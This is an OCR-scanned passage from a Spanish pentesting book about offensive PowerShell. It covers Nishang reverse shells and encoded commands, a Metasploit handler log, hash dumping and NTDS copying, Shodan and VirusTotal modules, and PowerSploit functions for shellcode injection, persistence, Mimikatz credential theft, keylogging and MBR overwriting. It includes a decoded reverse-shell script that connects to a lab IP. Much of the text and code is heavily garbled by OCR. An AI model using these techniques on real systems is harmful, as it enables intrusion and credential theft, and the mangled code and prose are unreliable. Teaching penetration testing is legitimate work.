^flflp3ftTflE4ftZqB3#C0ARBiftGS^Q5jflHQ»’!?.95?!!KS^SS2S!!?o™n??4ft 

^S^tsssssssssm 


n  H  QAcwft uftHQft V wBwftGMft b  A  B 


l££ 


TrifyfffioTstMjTlL*!! 


Fig.  318:  Creadon  de  eodigo  de  la  shell  in  versa. 


Un  parametro  interesante  en  la  ejecucion  de :  la proporctona  al  pentester  un  proceso 
SSL SXT-u”u°».  U  ejecucion  nuednda  dc  la  siguieme  ft.  “«• 
e.xe  -EncodedCommand  Sshell  -  Window  Hidden. 


55S 

En  la  imagen  sc  puede  visual  una 

se  indica  la  direccion  IP,  el  puerto  y  el  payload  utilizado,  en  cste 


rr.3f  exploit  (-  *  >  exp*0*' 

Started  reverse  handler  on  j.9*  .  x6- . 
if  Starting  the  payload  handler... 

Encoded  stage  with  xS€  •  2..ifcata_ca_.. 

Sending  encoded  Brace  (26^  b^e3)  ro  -92_16;.56.  ^  ig2 . 16S  .56. -  o: :  6196: 

Coicmand  shell  session  5  opened  U92.-68.s6.iu 
a-  2015-07-29  10:41:36  -0200 

SiRS'^S.K^IS.  ana  —  . 

:  _ _ - _ _ _  — - 


Fig.  3  29:  Configuration  de  exploit/multl/kandlei. 


iQac  es  lo  que  esta  detras  del  eodigo  en  based#  ^ede  utor  un '  ^^'Jo^ders  online 
base64  a  String  y  ver  el  eodigo  que  reaimente  *  *«*™«^i2*r  en  la  imagen  la  ftmeion 


Capindo  IH.  PowerShe//  pnro:  El  arte  del pe, nesting 


\L\ pentester  puede  utilizar  este  eodigo  como  base  para  hacer  sus  modificaciones  e  incluso  crear  otm 
i  po  e  pay  oat  stye  espues  puede  pasar  a  base64  y  ejecuiar  como  se  ha  mencionado  anteriormente 


^’8  *  (You  may  also  select  input  charset  j 


Saddress  ='192.168.56. 101;  Sport  =  '4444 
function  cleanup  { 

if  (Jsilent  Connected  -eq  Strue)  {Sclient.CloseO} 
lf  Wrqces  s  Exit  Code  -ne  Snull)  {$processC!qse()} 

§XiI/ 

Scfient  =  New -Qbjgct  system Jiet. sockets. tepelienJ 
^cljent.. cannect($address .  Sport) 

^stream  =  Scl  i  enj.  Get  S  t  rearn  ( ) 

»bUler  =^^ec*  Systetn.,Bytea  Sclient  ReceiveBufi'erSbe 
ip-ocess  =  Kc-.v-Objert  System  Diagnostics  Process 

{Sprocess  Startlnfo.FileName  =  $env  ComSpec . 

Fig.  3.30:  Decodificavion  de  base64  a  String. 


Otras  funciones  interesantes  son  Get-PostHashdwnpScript  v  Get-PostConvNTm :  i  , 

*s,  8“'™  ™  ■*%>  <i»c  S'  debe  nlmnccnn,  e„  una  vlblc  y  2 

. . .  C°m0  ”  hi“  proporciona . .  'yTESt  t  sZ 

n&rfNT  Z  X  r'ali“riprol»f=">™  a  "ombre  dc  usn.rio.  el  idemifiendor  de  usu.noyel  M  LM 


Ftg.  3.3  J:  Generation  de  eodigo  para  reaikar  el  hashdwnp. 


Como  se  puede  visualizar  en  en  ^el  vo,cddo  de  ^/ev  es  /  oiverSheIt.exe -Command $hashdun,p. 
kts  hashel  Si  3  ™8en  SC  °bt,ene  el  nombre  de  los  usuarios,  el  identificador  y 

«luviera  habiltedrf  C1°n  Pr  SC''  Ut‘,izada  para  un  posterior  crack™  del  hash  LM  si  este 
PayuheHcnh  °  ^  impersonalizaci6n  de  usuarios,  por  ejemplo  con  teentcas 
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..  „„„  „nin  (lel  fichero  NTDS.dit  que  se  encuentra  en 

La  funcion  Get-PostCopyNTDS  permite  real. /a.  una  cop.a  del  tiche 

los  controladores  de  dominio  de  la  organizacion. 


hashes  de  los  usuarios  y  maquinas  del  dominio. 


Fig.  3.32:  Obtencion  tie  usuarios y  hashes. 


P„r  ultimo,  la  utilization  de  la  fimcion  ^jg^o^'en^emotfi6  poTlo  que 

s  ^ +~> - — • — ■  * 

es,„  funcion.  siempre  y  cuando  se  cenga  el  pnvilegio  nccesano. 

LaejecuciOn  de  esta  funciOn  seria  similar  a  /P^»wn^en'dg<dno> 

-LPORT <puerto>:  Start-Post Remote  wets.  /  Credential  (Gel-Credential)].  Se  pone 

de  si  ei  usuario  ya  liene  ,a  crcdencial  cn 

memoria  necesaria  o  no. 


Servicios  externos  ^  ten  al  pentester  interacluar  via  API  con 

proporcionadas  por  los  modulos  de  VirusTotal  y  Shodan. 

Estos  mOdulos  han  sido  pueslos  en  olro  proyecto  llamado  Posh-Shodan  y  Posh-  VirusTotal,  accesiblet 
desde  el  Github  de  DarkOperatoi . 

consultas  que  se  pueden  realizar  en  su  silio  web  shodan., o. 

i  j  pjtcpv  la  cual  en  el  caso  de  Shodan  sl 
Para  utilizar  las  funciones  hay  que  disponer  de  una  - 

conseguir  desde  el  silio  web  creando  una  cuenta. 

A  con.inn.ciOn  se  enumeran  las  diferen.es  funciones  eon  una  breve  descripciOn: 


Funcion 


Sef-Shodat lAPIKey 


Read-Shodan  APIKey 


Descripcion 


Almacena  cl  valor  de  la  APIKey  paraj^erioruso 


Almacena  ei  vaiu»  uv.  - - : - T^tilla 

Aennri.  nl  cnnienido  dc  la  APIKey  sin  mostrariaporp^ 


Lapitulo  HI.  PowerSheU  puro:  El  arte  del  pentesting 
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Funcion 

Descripcion 

Get-ShodanA  PI  Info 

Devuelve  informacion  sobre  la  cuenta  de  la  APIKey.  Un 

ejemplo  sencilk.  seria  almacenar  la  APIKey  con  la  funcion 
Set-ShodanAPIKey  y  al  recuperar  la  informacion  dc  la  cucma 
con  la  funcion  Get-ShodanA  Pllnfo  se  puede  ejecutar  la 
siguiente  instruccion  Get-ShodanAPlInfo  - APIKey  (Read- 
ShodanAPIKev ) 

Get-ShodanService 

Enumera  ei  listado  de  servicios  disponibles 

Get-ShodanHostSen  ice 

Devuelve  informacion  sobre  una  direccion  IP.  Los  datos 

que  pueden  serdevueltos  son  el  sistema  operativo.  puertos 
abiertos,  organizacion  a  la  que  pertenece,  ISP  tipo  de 
protocolo  de  transporte,  etcetera.  Su  ejeeucion  es  Get- 
ShodanHostServiee  -APIKey  <vaIor>  -IPAddress  <direcci6n 

IP> 

Search-ShodanHosr 

Esta  funcion  permite  realizar  biisquedas  sobre  la  base  de 
datos  de  Shodan  en  busca  dc  maquinas.  Las  biisquedas  son 
tan  flexibles  como  las  query’s  que  se  pueden  hacer  a  trac  es  del 
sitio  web.  pudiendo  realizar  biisquedas  dc  banners ,  puertos, 
sislemas  operatives,  regiones.  geolocalizacion.  etcetera 

Measure-ShodanHost 

Proporciona  una  forma  dc  medir  los  rcsultados  de  las 

consultas.  En  otras  palabras.  si  se  realiza  una  biisqueda  sobre 
hosts,  por  ejemplo  de  Zahbix.  se  obtienc  el  resultado  de 
ocurrencias.  Un  caso  particular  seria  ejecutar  la  instruccion 
Measure-ShodanHost  -Quety  "~abbix  " 

G e t -Shodan  DNSResolve 

Realiza  resolucion  de  nombres  dc  dominio  a  traves  de  la  base 

_ dc  datos  de  Shodan _ 

Gel-ShocfanDNSRcver.\e 

Realiza  resolucion  inversa  de  direceiones  IP  a  traves  de  la 
base  de  datos  de  Shodan 

Get -Shodan  M\  iP 

Devuelve  la  direccion  IP  desde  donde  el  usuario  se  conecta 

Svarch-ShodanKxploit 

Esta  rune  ion  permite  realizar  biisquedas  sobre  la  base  dc 
datos  de  Shodan  cn  lo  referente  a  vulnerabilidades  y  exploits 
disponibles.  Esta  funcion  es  realmente  interesanlc  para  poder 
tener  acceso  a  una  gran  cantidad  de  exploits 

Measwe-ShodanExploit 

Permite  medir  el  mimero  de  ocurrencias  de  exploits  con 
una  quety  personalizable  en  funcion  de  las  neccsidades  del 
pentester 

labia  3.21:  Funciones  del  modulo  Shodan  en  Poxh-Shadun . 


mues,ran  las  ftinciones  del  m6dul°  de  VirusTotal,  el  cual  sc  puede  encon.rar  en 
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Funcion 

Descripci6n _ 

Get-Posh  VTVersion 

Chequea  la  version  del  modulo  de  VirusTolal  que  se 
encuentra  instalado  y  la  version  del  que  se  encuentra  en 

G  ithub _ _ 

Get-  VTA  PI  Key  I nfo 

Recupera  informacion  de  la  APIKey  almaccna 
previamente 

Get-  VTDoniain  Report 

Recupera  un  reporte  de  VirusTota!  para  un  domm.odado 

Get-VTFileBehaviourReport 

Recupera  el  reporte  que  indica  el  comportamiento  de  un 
fichero  al  ser  ejecutado  en  una  sandbox.  Para  esta  funcion  se 
rlehe  disDoner  de  una  APIKey  privada 

Get-  VTFileComment 

Recupera  los  comentarios  de  otros  miembros  de  la 
Comunidad  sobre  el  recurso  solicitado 

Get-  VTFileNetwork  Traffic 

Recupera  un  dump  del  trafico  dc  red  generado  por  un 

fichero  ejecutado  1 

Get-  VTFileReport 

Recupera  un  reporte  basico  de  VirusTota!  sobre  un  recurs^ 

Get-  VTFUeSample 

Descarga  un  fichero  a  traves  de  su  hash 

Get-  VTFileScanReport 

Recupera  los  resultados  de  un  escaneo  para  un  atchivo — 1 

Get-VTIP  Report 

Recupera  un  reporte  de  VirusTota!  almacenaao  para  una 
direccion  IPv4 

Get-  VTSpecial  URL 

Recupera  una  direccion  URL  especial  para  subtr  archivos  1 
mas  ^randes  de  32  MB  de  lamafio  — 1 

Get-  VTURLReport 

Recupera  un  reporte  de  VirusTolal  a  traves  de  una  d.reecion 

I IRI  prooorcionada  por  el  pentester  - 

Flimina  un  scan  programado  J 

Remo  ye-  VT Fil eRes cat  i 

Search-VTAdvancedReversed 

Realiza  busquedas  de  binarios  que  matchean  con  utios 

binarios.  metadatos  o  ci  iterios _ 1 

Set -VTA  PI  Key 

Configura  el  valor  de  la  APIKey  para  que  se  pueda  utilizar 
sin  necesidad  de  indicarla  implicitamente  en  cada  ejeeucion 
de  funciones _ 

Set-  VTFileComment 

Permite  subir  un  comentario  sobre  un  fichero  o  direccion 

URL  -4 

Set-  VTFileRescan 

Lanza  un  escaneo  o  programs  un  escaneo  para  ser  lanzado 
mas  adelante  _ J 

Submit-VTFile 

Submit-VTURL 

c„Hp  ..na  muestra  nara  ser  escaneada  por  Vn  usTotal — J 
Sube  una  direccion  URL  para  ser  escancada  por  VuuslotaJ 

...  .  _  .  i _ !>.... L  Ifit-tteTnteil 

Tablet  3.22:  Funciones  del  modulo  Virus  Total  en  t  osh-l  a  itsToial. 
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PoC:  Shodan  y  VirusTolal  en  tu  PowerShell 

En  esta  prueba  de  concepto  se  muestran  diversos  ejemplos  de  uso  de  funciones  de  Shodan y  VirusTolal 
a  traves  del  uso  de  la  API  de  ambos.  Hay  que  recordar  que  para  poder  utilizer  estas  funciones  hav 
que  disponer  de  una  APIKey ,  la  cual  se  puede  conseguir  creando  una  cuenta  en  cada  servicio. 


La  pnmera  luncion  es  Get-ShodanHostService  la  cual  recupera  informacion  de  una  direccion 
IP  aportada  por  el  pentester.  En  un  pentest.  una  vez  conocidas  todas  las  direcciones  IP  de  una 
orgamzacion  pueden  pasarse  por  este  servicio  para  consultar  la  informacion  disponible  en  Shodan. 


PowershellsPo^Shodan^pMjstep^Get-ShodaoHostSewic 


'i%egion_code 

ip 

area_code 

latitude 

hostnames 

|postal_code 

dma_code 

country__code 

org 

data 


|c  ity 
isp 

longitude 

last_update 

|countr</_code3 

countr«/_name 

ip_str 

os 

ports 


CA 

134744072 

650 

37,385999999999996 

94035 le~PUbliC~dnS~a'g0°gle‘COn> 

807 

US 

Google 

< P< ip =134744072 ;  isp=Google;  transport =udp;  data= 
Recursion:  enabled;  asn=AS15169;  port=53; 
nos  t  names -Sirs  t  em .  Object  [];  locat  ion  =  ; 
tinestanp=2015-07-31Tll :06 :ll .123120; 

opts=rip^r=8°8d8?8>>;  °^=Goo»le'  = 

AS15169 
Mountain  Uiew 
Google 
-122,0838 

201 5 -07-31 Til :06 =11.123120 
USA 

United  States 

8. 8. 8. 8 


<53> 


/  ig,  3.33.  Recuperation  de  information  de  un  host  concrete  en  Shodan. 


.  .  —  uuu  VC/,  UCSCUDienaS, 

poresle  servicio  de  fonna  automatic^  scria  la  siguiente  cat  <fwhero  con  direcciones  IP>  / breach  { 
oet-ShodanHostService  -APIKey  <apikev>  -IPAddress  $_}. 

Lo  unico  que  se  debe  tener  en  cuenta  es  que  se  ticne  que  crear  un  fichero  de  texto  con  las  direcciones 
u.  una  direccion  por  linea  en  el  fichero. 


Otra  de  las  funciones  importantes  para  un  pentest  utilizando  Shodan  es  Search-ShodanExploit  va 
M  c  sc  puede  obtener  informacion  sobre  vulnerabilidades  y  exploits. 

*"!*  iWTn  ?!  PUC?  Visualizar  como  se  realiza  una  busqueda  para  enconlrar  matches  con  la 

OSmnnin  ??fD  '  ?'SlCn  °tr0S  Parametros  P°r  los  se  pueden  realizar  busquedas  como  CPE. 
1313,  BID,  MSB.  platform,  type  o  puerto. 
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PS  D:\libros\oentestino  nowershellNPoshjShodan^master^CSeai^ch ,S^£che£ 

t  -API Key 


(source 

Lid 

Idescript  ion 


osudb 

bid 

cue 

nsb 

source 

_id 

descript ion 


osudb 

bid 

cue 

nsb 


CUE 

201 3  1364  .  •  rr _ » -i  :  y  kp c  o  **0  1 .8 .16  on d  2.x 

Tbe  user.login  function  in  Zabbxxbefor  ouerride  LDAP 

before  2.0.5rcl  allows  renote  attacKei^ 
configuration  uia  tbe  cnf  paranetei  . 

<> 

<57471> 

CCUE-2013-1364> 

<> 

CUE 

2013-5572  fiPni- icated  users  to  discouer 

source  code. 

<> 

<CUE-20l3-5572> 

O 


PS  D:\librosNpentesting  pouershellNPosh  Shodan  master>  orm  multi 

iple,'-Pagea?!X>^atches>K!9Wl.e,.e-0Wect  <5_._id  -eg  1»3V0> 


code 

description 

author 

_id 

source 

platf orn 

date 

cue 

type 

port 


php  5.3.8  -  Multiple  Vulnerabilities 
Maksynilian  Arcienowicz 

18370 

ExploitDB 

2012-01-1 4T00  =  00 : 00*00 : 00 

<2012-07811 

dos 

0  _ 


fig.  3.34:  Busqtteda  de  exploits  a  troves  de  Shodan. 


En  la  segunda  parte  de  la  imagen  se  puede  visualtzar  la  ejecua,  1 J  blisqucda^  a 

diferentes  paginas  devueltas  por  Shodan.  Hay  que entender que  Epcro  se 

iraves  de  la  API  se  encuentran  pagtnados.  01  e  CL  '  caso  (a  ejecuci6n  100  \  foi-each 

pueden  solicitar  el  resto  de  paginas  con  un  simpl estnp  .  <-  -  )  matches}  \  Where-Object 

! (Search-ShodanExploit  -API Key  <apikev>  resultados  devueltos  por 

Platform  puede  ser  diversa,  por  ejemplo  con  Windows  o  Linux. 

La  iU.  luncion  qua  sE  «.  .  «  P-b.  de  concep.o  sobre  -  ■*«•  **££  g-r 
ShuihmHia.  la  cual  penvnte  mcdir  los  resultados.  En  la,ima““  .  ,P  ,  .  jnas  e  ,lcnc„  como 

y  procesadas  con  la  funcion  Search -Shodan Host. 
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PIKevlihl‘°SVPenteStln*  noue*'sbell\Posh-Shodan-niaster>  Measur.-ShodanHost 

y  JUU  -Query  ”ssh~2.0  weOnlyDo  2.1.3” 

matches 


Fig.  3.35:  Medicidn  de  hosts  encontrados  en  Shodan  con  una  condicion  determinada. 

En  la  siguiente  imagen  se  puede  observar  como  se  realiza  una  subida  de  una  muestra  a  VimsTotal 
para  que  se  pueda  analizar.  La  funcion  de  subida  de  archivos  Submit-VTFUe  devuelve  information 
sobre  el  hash,  el  identifieador  del  escaneo,  cl  identificador  de  recurso  con  la  que  se  puede  obtener 
despues  mas  mformac.on.  La  foncidn  Get-VTFUeReport.  la  cual  tambien  se  puede  visuaiizar  en  la 
imagen,  permite  recuperar  el  reporte  con  toda  la  informacion,  publica.  sobre  el  analisis. 


» i oca i— naster >  Subnit-UTFxle  -F 


ile  .\PsExec.exe  -APIKey 
0d56fe?b4d538  * 


can_id  :  |b08535b4addl94fS661ell31c8e81af3V3ca322cf669674cfl2?209S. 

lal  :  b5c62d79eda4f 7e4b60a9caa5736a3f dc2f lb27e 

esource  :  3b08S3Sb4addl94f566Xell31c8e81af 373ca322cf669674cf 1272095e 

esponse_code  :  1 

:  5cfb955b4addl94f5661ell31c8e81af373ca322cf669674cfl272095e 
“~link  ■ 

„5,  :  <J?f  ?a0f  74c8b48f  1699858b3b6clleda 

ose_msg  .  Scan^ request  successfully  queued,  come  back  later  for  the 

ftpiKeyb,'°SN,,enteStin?*  •Jowershell\Posh-UirusTotal-roaster>  Get-UTFileReport 
esource  3b08S3Sb4addl94f S661ell31c8e81af373ca322cf669674cf 127209Se5cab9S 

anS  ’  ^ftav=;  MicroUorld-eScan  =  ;  nProtect  =  ;  CAT-QuickHeal-- 

Malwaj;e bytes-;  Zillya=;  SUPEBAnt iSpyware-;  ’ 

— =:  Bit£e£endei%=;  K7GW=;  TheHacker  =  ; 
NAN0-Antiuirus=;  F-Prot=;  Synantec=;  ESET-NOD32=; 
TrendMicro-HouseCaH^;  Auast  =  ;  ClanAU  =  ;  Kasuersku=- 
BiKobot  =  ;  ByteHero  = ;  Risings; 

Ad  Aware-;  Sophos-;  Comodo=;  F— Secure  = ;  DrUeb=*  UIPRF=* 
TrendMicro=;  hefif ee-GU-Edition=;  Emsisoft=;  Cyren  =  -  ’ 

•‘“r.1  ftn£iy"ftUL=:  Kingsof t=;  Microsoft; 
0B832="  Baidu— lnt?=n  ??atar;  8hnLab-U3=;  ALVac  =  ;  ftUware-; 

Fort  inet  =alflUG=?tpanda=^r>Qihoo-360=>  *  Ie"cent  =  =  **■—«* 
can_id  :  3b0853Sb4addl94f S661ell31c8e81af 373ca322cf6696?4cfl27209Se 

, J1  :  bSc62d79eda4f 7e4b60a9caa5736a3fdc2f lb27e 

1  5cab9S5b4addl94f5661ell31c8e81af373ca322cf669674cfl2720’5e 

?sponse_code  :  1 

•an_date  :  2015-08-02  05:56:06 

irmalink  :  bttps:^/w»w.uirustotal.com/f  ile/3b08535b4addl94f5661rll  31^ 

8e81af 373ca322cf 669674cfl272095e5cab9S/analysis/1438494966 

rbose_msg  :  Scan  finished,  information  embedded 

sitiues  :  l 

1  Icah9i5b4addl94f5661ell31c8e81af373ca322cf669674cfl272095e 


esponse_code 

can_date 

ernalink 


erbose_nsg 

otal 

□sitiues 

ha256 


hig.  3.36  Subida  de  muestra  para  analisis  y  tvcuperacion  de  informacion  de  VimsTotal. 
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5.  PowerSploit 

PowerSphi,  son  un  conjnmo  dc  modulus  que  proporcionan  una  coleccidn  de  toctow.  utte  para 
aluunas  fases  de  la  exploration,  pero  sobrc  rodo  para  las  rases  de  ™ “  * 

mpusion.  PowerSploit  se  ha  dividido  en  dos  ramas  d.tereneiadas  en  la  qne  se  pneden  enconrra, 

diferentes  scripts  con  un  objetivo  distinto. 

La  rama  clasica  es  /W*rta< ,  se  pued.  encontrar  en  la  siguicmc 
caaPmauifexmioa/Po^rSpl 

enconirada  ea  la  sigaieme  direction  URL  hllps://silhub.  com/mall, feslafion,  To  ■  • 

La  rama  clasic,  de  PowerSphl,  proporciona  an  conjnnto  de  modules  para  Uevar  a  cabo  ejecueiones 
de  cJdio  eTasidn  de  antivima.  reeopilaeidn  de  iaformaeidn  y  manipulation  de  esra.  gesuon  de  la 
persistence  en  ana  fasc  de  posl-explotacida,  manipulation  senctlla  de  scnpis  en  la  maquina  vrc  ima, 

etcetera. 

Por  otro  lado  PowerShell  A, semi  es  an  rnddnlo  ulilizado  para  ayudar  con  la  mgeniem  inverse.  El 
mil  nedc  ser  urilizado  para  desensambla,  fieheros.  realizar  -ias £ 
de  memoria, parse*  diferentes  formates  y  obtener  mformacton  mtema  de  los  sislemas. 

Las  funeionalidades  qae  son  proporcionadas  por  PawrSploi,  se  paeden  enamerar  en  la  sigaieme 

lista:  .  -ir 

Code  Execution.  Las  funciones  que  se  encuentran  en  esta  categoria  proporcionan  a  via 
para  ^cutar  codigo,  ya  sea  a  .raves  de  DLL  injection .  Reflective  PE  Injection  o  la  ejecucon 

de  una  sheUcode. 

-  Script  Modification.  Modifica  u  optimiza  la  ejecucion  de  scripts  sobre  una  maquina 

comprometida.  ,  . 

Persistence  Una  funcionalidad  interesantc  en  un  pen  test,  y  que  en  otros .frameworks  c 
PowerShel l  no  se  encuentran.  Estas  funciones  penniten  al  pentester  disponer  de  la  posibilidai 
dHolv"  eeder  a,  equipo  o  de  ejeeutar  diferentes  aeeion.s  a  .raves  de  scrip, s  programadas 
en  el  tiempo.  En  resumen,  genera  persistencia  en  el  equipo  comprometido. 

Antivirus  Bvpass  Ayuda  a  realizar  bypass  sobre  los  antivirus.  Solo  hay  una  tuncion  cn 
'esta  categoria.  la  coal  permite  localizar  firmas  seneilla,  ntilizando  el  mismo  metodo  DSpla 

con  la  clase  101.  . 

Rrfi  It  rat  ion  Esta  categoria  proporciona  al  pentester  funciones  para  ejecu  ar un 

por  eiemplo  de  fieheros  bloqueados  por  el  sistema,  configurar  un  xp  ogger  , 

mini  volcado  de  memoria.  eonsegurr  scmmha*  en  remote,  etcetera.  Un.  categoria  mm 

interesante  para  \a  post-explotacion. 

-  Mayhem.  Esta  categoria  dispone  de  2  funciones  las  cuales  manejan  estruc  ras 
La  primera  puede  modificar  el  Master  Boot  Record y  la  segunda  provoca  un  pantall 
para  provocar  un  volcado  de  memoria  RAM. 
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-  Recon  Esta  categoria  proporciona  funciones  que  pueden  ser  utilizadas  en  la  fase 
de  recopiLeion  de  information.  Algunas  funciones  proper™  msolSt  inversa  d“ 

f'Z^VnZZ  y  eSCane°  S°bre  Un  gn,P°  ^  mi<l“inaS  pi'dicnd°  ser  u"'lkada  “  ia  toe  * 

cLoantinuSm  5  pr0p°rei<>"adas  por  Arsenal  son  Ins  que  se  enumemn  , 

-  Disassembly.  Estas  funciones  desensamblan  codigo  nativo  y  gestionado. 

Malware  Analysis.  Herramientas  utiles  cuando  se  realiza  un  analisis  de  malware. 

-  .Memoir  Tools.  Funciones  que  permilen  al  pentester  realizar  un  analisis  de  procesos  que 
se  encuentran  en  memoria  y  de  la  informacion  que  se  alberga  en  ella. 

Pen  sets.  Perm  iten  parsear  estructuras  en  memoria. 

operative ^  0btiene"  Y  a"aliZan  3  baj°  "ivd  informaci6n  ^obre  el  sistema 

:  MSC.  y.  Iibraries-  Funciones  y  librerias  de  ayuda  para  mejorar  la  experiencia  de  la 
ingemeria  mversa  en  PowerShel!.  P  at  13 

Code  Execution 

Esta  categoria  es  una  de  las  mas  llamativas,  ya  que  la  ejecucion  de  codigo  en  un  sistema  siemnre 
mucho  la  n, one, on  del  usunrio.  La  ejeeueidn  de  codigo  a  traces  dc  estos  ,rr-™»  ticne  su™ 
ventajas.  ya  que  la  evasion  de  mecanismos  de  seguridad  es  algo  prioritario  en  un  test  dc  intrusion. 

mddulof“ie""  “b'a  ”  m“CS"”n  diS,i"'aS  'b"d°neS  q“e  pueden  scr  eJ“““das  a  traves  de  este 


Funcion 

Descripcion 

1 n  voke-She/Icode 

Esta  funcion  inyecta  una  sheUcode  dentro  de  un  proceso 
indicado,  siempre  y  cuando  se  tenga  el  mismo  o  superior 
privilegio,  o  en  el  propio  entomo  de  la  consola  de  PowerS- 
hdi  La  sheUcode  que  se  inyecta  es  un  windows/meterpreter/ 
reverse  https 

Invoke-ShellcodeMSIL 

Ejecuta  una  shellcode  dentro  del  contexto  en  el  que  se  eje- 

cuta  la  PowerShel l  sin  utilizar  ninguna  llamada  a  funciones 
Win32 

/ nvoke-DU Injection 

Inyecta  una  DLL  dentro  de  un  proceso  seleccionado  por  el 
usuario 

Iwoke-ReflectivePE Inject  ion 

Carga  un  archive  Windows  PE  (DLL  o  EXE)  en  el  proceso 

de  PowerShel!  o  inyecta  una  DLL  en  un  proceso  remoto 

Tabla  3.23:  Funciones  de  Code  Execution  en  PowerSploit. 
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en  la  maquina  comprometida. 

En  la  siguiente  tabla  se  muestran  las  distintas  funciones  que  pueden  scr  cjecutadas  en  esie  modulo: 


Funcion 

Descripcion 

Remove-Comments 

Fljmjnn  Ins  cnmentarios  y  espacios  en  bianco  de  un  saipt 

Out-EncryptedScript 

Cii'ra  el  contenido  de  archivos  o  scripts.  Esto  puedc  scr 
interesante  si  se  quiere  almacenar  en  un  equipo.  durante  un  tempo 
informacion  referente  a.  por  ejemplo,  una  cadena  de  conexton, 
datos  obtenidos  que  quieren  ser  enviados  a  traves  de  la  led, 
etcetera 

Ont-EncodedCommand 

Comprime.  encoded  en  Base64  y  genera  una  sahda  en  lonnato 
EncodedCommand ,  la  cual  puede  ser  ejecutada  a  traves  dc 
la  instruction  PowerShcll.exe  -EncodedCommand  <sahda 
generation 

Out-CompresseclDll 

Comprime.  encoded  en  Base64  y  genera  un  cod.go  para  Larger  una 
managed  DLL  en  memoria 

Tahiti  3. 24:  Fwichnes  tic  Script  Modification  en  Po\ui  Sploit. 


as.  La  posibilidad  de  poder  ejecutar  codigo  o  un  script  en 


Persistence 

compromet i da  prev iamente. 


Funcion 

Descripcion 

New-UserPersistenceOption 

Configure  diferentes  opcioncs  relacionadas  con  la 

persistencia  para  que  puedan  ser  utilizadas  por  la  luncu  n 
Add-Persistence 

New-ElevatedPersistenceOption 

Configura  diferentes  opetones  relacionadas  con  la 

persistencia  y  la  elevacion  de  acciones - 

A  dd-Persistence  _ 

Install-SSP 

Crea  persistencia  en  el  sistema  de  un  so  ijd - 

lnstala  una  DLL  que  aoorte  un  SSP.  Security  SupportProvul Wj 

Ger-SecuritvPackages 

tabla  3.22 

Enumera  todos  los  SSP  cargados _ 1 

>/  Funciones  de  Persistence  en  PowerSploil 
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Exfiltration 

Las  funciones  de  esta  categoria  son  ulilizadas  para  mostrar  y  manipular  informacion  del  sistema 
comprometido  a  iraves  de  PowerShell.  Son  funciones  importantes  que  pueden  ser  ulilizadas  durante 
el  pentest  para  consegutr  capturas  de  pantallas.  realizar  pivoting  de  procesos.  gestionar  copias  de 
archtyos  bloqueados  por  el  sistema.  captura  de  pulsaciones.  etcetera.  A  continuacion  sc  muestra  una 
descripcion  de  las  lunciones  que  integran  el  modulo. 


Funcion 

Descripcion 

fm vke-  Token  Manipulation 

Esta  funcion  requierc  de  permisos  de  adminislrador.  Permite 

enumerar  y  gestionar  los  diferentes  token  que  pueden  existir  en 
el  sistema  operativo.  Es  una  funcion  muy  potente  en  la  post- 
explotacion,  ademas.  permite  realizar/r/iwmgentre  procesos. 

Por  ejemplo.  se  puede  ejecutar  un  proceso  con  cierto  privilegio 
y  despues  realizar  la  captura  de  sus  pulsaciones,  juntando  la 
impersonalizacion  de  tokens  con  la  funcion  de  ker/ogging.  Dos 
ejemplos  scncillos  son  / n  voke-  Token  Manipulation  Enumerate 
y  Invoke- TokenManipidation  —ImpersonateUser  -Username  "nt 
aiithonn-\svstem" 

Invoke-Credentiallnjection 

Esta  luncion  crca  un  inicio  de  sesion  con  credcnciales  en  texto 
piano  y  se  puede  inyectar  en  LSALogonVser.  para  posterionnente 
ser  utilizado  desdc  un  login  de  RDP  o  un  login  local 

f n  i  oke-N injaCopy  • 

Esta  funcion  copia  un  fichero  desde  un  sistema  NTFS  mediante 

lecture  del  volumen  en  bruto  y  analizar  sus  estructuras 

Invoke-  Mi  mi  hat z 

Esta  luncion  carga  Mimikatz  1.0  e n  memoria  utilizando 
PowerShell.  Esto  puede  ser  utilizado  para  hacer  un  dvmpeo  de 
credenciales  sin  escribir  nada  en  disco.  En  una  fase  d epost- 
exptotacion  puede  permitir  obtener  informacion  sensible  de 
los  usuarios.  como  por  ejemplo  sus  contrasefias.  La  funcion  es 
aplicable  hasta  Windows  ,V 

Get- Keystrokes 

Esta  funcion  registra  las  pulsaciones  realizadas  por  cl  usuario  de  la 

maquina  sobre  la  ventana  activa 

Get-  GPP  Pass  word 

Esta  luncion  recupera  contrasefias  en  texto  piano  y  otra 
informacion  de  cuentas  que  fucron  abiertas  a  traves  de  las  pollticas 
dc  directivas  dc  urupo 

Get-  TimedScreenshnt 

Esta  luncion  realiza  screenshots,  siendo  configurable  cl  intervalo 

de  actuation.  Las  capturas  dc  pantalla  realizadas  se  almacenan  en 

una  carpeta 

Get-  VohtmeShadowCopy 

Enumera  las  rutas  de  los  dispositivos  de  todos  los  volumcnes 
locales  compatibles  con  shadow  copies 
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Funcion 

Description 

Mount- 

VolumeShadowCopy 

Monta  un  volumen  en  modo  shadow  copy 

Recupera  las  credenciales  almacenadas  en  Vault  Credential ,  el 

Get-  VaullCredential 

cual  es  un  componente  del  sistema  que  aimaccud 

inlroducidas  en  sitios  web  y  credenciales  de  Windows 

Out-Minidump 

Genera  un  minidump  completo  de  memoria  de  un  proceso 
proporcionado  por  el  pentester.  Esta  funcion  es  util  para  poder 
examinar  lo  que  el  proceso  alberga  en  memoria 

1 - 

Tabia  3.26:  Funciones  de  Exfiltration  en  PowerSploit 

Otros:  Mayhem,  Recon  y  AV  Bypass 


Funcion 

Description 

Find-AVSignature 

Local iza  Single  Byte  A  V  utilizando  el  mismo  inetodo  que  DSplit  desde 

"class  101 Esta  funcion  pertenece  al  modulo  A  V  Bypass 

Set- MasterBoot  Record 

Esta  funcion  cs  una  prueba  de  concepto  que  sobrescribc  el  Master 
Boot  Record  con  el  mensaje  que  el  usuario  indique.  Este  modulo  per- 
tenece  a  Mayhem 

Set-CriticalProcess 

Esta  funcidn  provoca  un  pantallazo  azul  en  Windows.  Este  modulo 
pertenece  a  Mayhem 

Invoke-Portscan 

Esta  funcion  proporciona  un  escaner  de  puertos  basico.  Intcresante 
funcion  para  la  fase  de  fingerprinting.  Este  modulo  pertenece  al  modu- 

lo  Recon 

Get-HTTPStatus 

Esta  funcion  realiza  peticiones  HTTP  y  devuelve  el  codigo  de  estado  y 
la  direccion  URL  completa.  Este  modulo  pertenece  al  modulo  Ream. 
Un  cjemplo  sencillo  de  ejecucion  seria  Get-HtlpStatus  -Tiuget  <<  <>- 
minio>  Esta  ejecucion  comienza  a  hacer  fuerza  bruta  de  directories  y 
